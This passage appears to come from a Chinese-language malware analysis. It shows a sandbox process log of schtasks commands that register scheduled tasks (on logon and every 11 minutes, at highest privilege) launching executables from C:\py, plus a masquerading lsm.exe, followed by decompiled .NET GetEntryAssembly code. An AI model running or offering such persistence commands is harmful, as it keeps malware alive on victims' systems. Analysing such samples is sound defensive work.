/tr "'C:\py\cmd.exe'" /rl HIGHEST /f schtasks.exe (PID:2488) schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\py\Idle.exe'" /f lsm.exe (PID:2984) "C:\Program Files\Microsoft.NET\lsm.exe" schtasks.exe (PID:2856) schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\py\Idle.exe'" /rl HIGHEST /f
追下 该PE文件的来源:
就是下面的出处了:
// Token: 0x06004272 RID: 17010 RVA: 0x000F61C0 File Offset: 0x000F43C0
[SecuritySafeCritical]
public static Assembly GetEntryAssembly()
{
AppDomainManager appDomainManager = AppDomain.CurrentDomain.DomainManager;
if (appDomainManager == null)
{
appDomainManager = new AppDomainManager();
}
return appDomainManager.EntryAssembly;
}
